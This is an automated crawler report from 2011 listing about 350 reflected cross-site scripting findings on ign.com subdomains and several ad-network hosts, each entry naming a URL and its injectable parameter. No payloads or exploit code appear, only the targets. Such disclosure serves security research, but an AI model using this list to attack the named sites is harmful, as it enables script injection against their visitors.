XSS, Cross Site Scripting, DORK, ign.com, CWE-79, CAPEC-86

XSS in ign.com HTTP Systems | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Feb 06 20:44:36 CST 2011.



DORK CWE-79 XSS Report

1. Cross-site scripting (reflected)

1.1. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

1.2. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

1.3. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

1.4. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

1.5. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

1.6. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

1.7. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

1.8. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

1.9. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

1.10. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

1.11. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

1.12. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

1.13. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

1.14. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

1.15. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

1.16. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

1.17. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

1.18. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

1.19. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

1.20. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

1.21. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

1.22. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

1.23. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

1.24. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

1.25. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

1.26. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

1.27. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

1.28. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

1.29. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

1.30. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

1.31. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

1.32. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

1.33. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

1.34. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

1.35. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

1.36. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

1.37. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

1.38. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

1.39. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

1.40. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

1.41. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

1.42. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

1.43. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

1.44. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

1.45. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

1.46. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

1.47. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.48. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.50. http://ads.adxpose.com/ads/ads.js [uid parameter]

1.51. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.52. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

1.53. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

1.54. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.55. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.56. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.57. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.58. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.59. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.60. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.62. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

1.63. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

1.64. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.65. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.66. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.67. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.68. http://boards.ign.com/ [name of an arbitrarily supplied request parameter]

1.69. http://boards.ign.com/comics_boards/c5025 [name of an arbitrarily supplied request parameter]

1.70. http://boards.ign.com/game_help_community_board/b5143/p1 [name of an arbitrarily supplied request parameter]

1.71. http://boards.ign.com/general_game_help_board/b5030/p1 [name of an arbitrarily supplied request parameter]

1.72. http://boards.ign.com/movies/c5017 [name of an arbitrarily supplied request parameter]

1.73. http://boards.ign.com/nintendo_wii_ds_boards/c5062 [name of an arbitrarily supplied request parameter]

1.74. http://boards.ign.com/pc_games_and_more/c5060 [name of an arbitrarily supplied request parameter]

1.75. http://boards.ign.com/playstation_boards/c5058 [name of an arbitrarily supplied request parameter]

1.76. http://boards.ign.com/tv/c5026 [name of an arbitrarily supplied request parameter]

1.77. http://boards.ign.com/xbox_360_boards/c5056 [name of an arbitrarily supplied request parameter]

1.78. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

1.79. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

1.80. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

1.81. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

1.82. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

1.83. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

1.84. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

1.85. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

1.86. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

1.87. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

1.88. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

1.89. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

1.90. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

1.91. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

1.92. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

1.93. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

1.94. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

1.95. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

1.96. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

1.97. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

1.98. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

1.99. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

1.100. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

1.101. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

1.102. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

1.103. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

1.104. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

1.105. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

1.106. http://club.ign.com/b/api/objects/user.js [callback parameter]

1.107. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

1.108. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

1.109. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

1.110. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

1.111. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

1.112. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

1.113. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

1.114. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

1.115. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.116. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.117. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.118. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.119. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.120. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.121. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.122. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.123. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.124. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.125. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.126. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.127. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

1.128. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

1.129. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

1.130. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

1.131. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

1.132. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

1.133. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

1.134. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

1.135. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.136. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.137. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

1.138. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

1.139. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

1.140. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

1.141. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

1.142. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

1.143. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

1.144. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

1.145. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

1.146. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

1.147. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

1.148. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

1.149. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

1.150. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

1.151. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.152. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.153. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.154. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.155. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.156. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.157. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.158. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.159. http://ds.ign.com/index/latest-updates.html [types parameter]

1.160. http://ds.ign.com/index/latest-updates.html [types parameter]

1.161. http://ds.ign.com/index/latest-updates.html [types parameter]

1.162. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.163. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.164. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.165. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.166. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.167. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.168. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.169. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.170. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.171. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.172. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

1.173. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

1.174. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

1.175. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

1.176. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.177. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.178. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.179. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.180. http://event.adxpose.com/event.flow [uid parameter]

1.181. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

1.182. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

1.183. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

1.184. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

1.185. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

1.186. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

1.187. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

1.188. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

1.189. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

1.190. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

1.191. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

1.192. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

1.193. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

1.194. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

1.195. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

1.196. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

1.197. http://fimserve.ign.com/ [__ipculture parameter]

1.198. http://fimserve.ign.com/ [__preferredculture parameter]

1.199. http://fimserve.ign.com/ [name of an arbitrarily supplied request parameter]

1.200. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 1]

1.201. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 2]

1.202. http://fonts.ignimgs.com/wns6kpl.js [REST URL parameter 1]

1.203. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

1.204. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

1.205. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

1.206. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

1.207. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

1.208. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

1.209. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

1.210. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

1.211. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

1.212. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

1.213. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

1.214. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

1.215. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

1.216. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

1.217. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

1.218. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

1.219. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

1.220. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

1.221. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

1.222. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

1.223. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

1.224. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

1.225. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

1.226. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

1.227. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

1.228. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

1.229. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

1.230. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

1.231. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]

1.232. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]

1.233. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]

1.234. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]

1.235. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]

1.236. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]

1.237. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]

1.238. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]

1.239. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]

1.240. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]

1.241. http://ib.adnxs.com/ab [cnd parameter]

1.242. http://ib.adnxs.com/ab [referrer parameter]

1.243. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]

1.244. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]

1.245. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpck parameter]

1.246. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpck parameter]

1.247. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpvc parameter]

1.248. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpvc parameter]

1.249. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpck parameter]

1.250. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpck parameter]

1.251. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpvc parameter]

1.252. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpvc parameter]

1.253. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]

1.254. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]

1.255. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

1.256. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

1.257. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

1.258. http://js.revsci.net/gateway/gw.js [csid parameter]

1.259. http://landlanss.gfi.com/freeware-network-security-scanner-sm/ [REST URL parameter 1]

1.260. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]

1.261. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]

1.262. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]

1.263. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]

1.264. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]

1.265. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]

1.266. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]

1.267. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]

1.268. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]

1.269. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]

1.270. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]

1.271. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]

1.272. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]

1.273. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]

1.274. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]

1.275. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]

1.276. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]

1.277. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]

1.278. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]

1.279. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]

1.280. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]

1.281. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]

1.282. http://movies.ign.com/articles/114/1147900p1.html [name of an arbitrarily supplied request parameter]

1.283. http://movies.ign.com/articles/114/1147900p1.html [name of an arbitrarily supplied request parameter]

1.284. http://movies.ign.com/articles/114/1147929p1.html [name of an arbitrarily supplied request parameter]

1.285. http://movies.ign.com/articles/114/1147929p1.html [name of an arbitrarily supplied request parameter]

1.286. http://movies.ign.com/articles/114/1148092c.html [name of an arbitrarily supplied request parameter]

1.287. http://movies.ign.com/articles/114/1148092c.html [name of an arbitrarily supplied request parameter]

1.288. http://movies.ign.com/articles/114/1148092p1.html [name of an arbitrarily supplied request parameter]

1.289. http://movies.ign.com/articles/114/1148092p1.html [name of an arbitrarily supplied request parameter]

1.290. http://movies.ign.com/articles/114/1148108p1.html [name of an arbitrarily supplied request parameter]

1.291. http://movies.ign.com/articles/114/1148108p1.html [name of an arbitrarily supplied request parameter]

1.292. http://movies.ign.com/articles/114/1148114p1.html [name of an arbitrarily supplied request parameter]

1.293. http://movies.ign.com/articles/114/1148114p1.html [name of an arbitrarily supplied request parameter]

1.294. http://movies.ign.com/articles/114/1148115p1.html [name of an arbitrarily supplied request parameter]

1.295. http://movies.ign.com/articles/114/1148115p1.html [name of an arbitrarily supplied request parameter]

1.296. http://movies.ign.com/gamestofilm.html [name of an arbitrarily supplied request parameter]

1.297. http://movies.ign.com/gamestofilm.html [name of an arbitrarily supplied request parameter]

1.298. http://movies.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.299. http://movies.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.300. http://movies.ign.com/index/movies.html [name of an arbitrarily supplied request parameter]

1.301. http://movies.ign.com/index/movies.html [name of an arbitrarily supplied request parameter]

1.302. http://movies.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.303. http://movies.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.304. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.305. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.306. http://movies.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.307. http://movies.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

1.308. http://movies.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.309. http://movies.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.310. http://movies.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.311. http://movies.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.312. http://movies.ign.com/trailers.html [name of an arbitrarily supplied request parameter]

1.313. http://movies.ign.com/trailers.html [name of an arbitrarily supplied request parameter]

1.314. http://music.ign.com/ [name of an arbitrarily supplied request parameter]

1.315. http://music.ign.com/ [name of an arbitrarily supplied request parameter]

1.316. http://pc.ign.com/ [name of an arbitrarily supplied request parameter]

1.317. http://pc.ign.com/ [name of an arbitrarily supplied request parameter]

1.318. http://pc.ign.com/articles/111/1119875p1.html [name of an arbitrarily supplied request parameter]

1.319. http://pc.ign.com/articles/111/1119875p1.html [name of an arbitrarily supplied request parameter]

1.320. http://pc.ign.com/articles/113/1137541p1.html [name of an arbitrarily supplied request parameter]

1.321. http://pc.ign.com/articles/113/1137541p1.html [name of an arbitrarily supplied request parameter]

1.322. http://pc.ign.com/articles/114/1145020p1.html [name of an arbitrarily supplied request parameter]

1.323. http://pc.ign.com/articles/114/1145020p1.html [name of an arbitrarily supplied request parameter]

1.324. http://pc.ign.com/articles/114/1145332p1.html [name of an arbitrarily supplied request parameter]

1.325. http://pc.ign.com/articles/114/1145332p1.html [name of an arbitrarily supplied request parameter]

1.326. http://pc.ign.com/articles/114/1146760p1.html [name of an arbitrarily supplied request parameter]

1.327. http://pc.ign.com/articles/114/1146760p1.html [name of an arbitrarily supplied request parameter]

1.328. http://pc.ign.com/articles/114/1147797p1.html [name of an arbitrarily supplied request parameter]

1.329. http://pc.ign.com/articles/114/1147797p1.html [name of an arbitrarily supplied request parameter]

1.330. http://pc.ign.com/articles/114/1147953p1.html [name of an arbitrarily supplied request parameter]

1.331. http://pc.ign.com/articles/114/1147953p1.html [name of an arbitrarily supplied request parameter]

1.332. http://pc.ign.com/articles/114/1147988p1.html [name of an arbitrarily supplied request parameter]

1.333. http://pc.ign.com/articles/114/1147988p1.html [name of an arbitrarily supplied request parameter]

1.334. http://pc.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.335. http://pc.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.336. http://pc.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.337. http://pc.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.338. http://pc.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.339. http://pc.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.340. http://pc.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.341. http://pc.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.342. http://pc.ign.com/index/latest-updates.html [types parameter]

1.343. http://pc.ign.com/index/latest-updates.html [types parameter]

1.344. http://pc.ign.com/index/latest-updates.html [types parameter]

1.345. http://pc.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.346. http://pc.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.347. http://pc.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.348. http://pc.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.349. http://pc.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

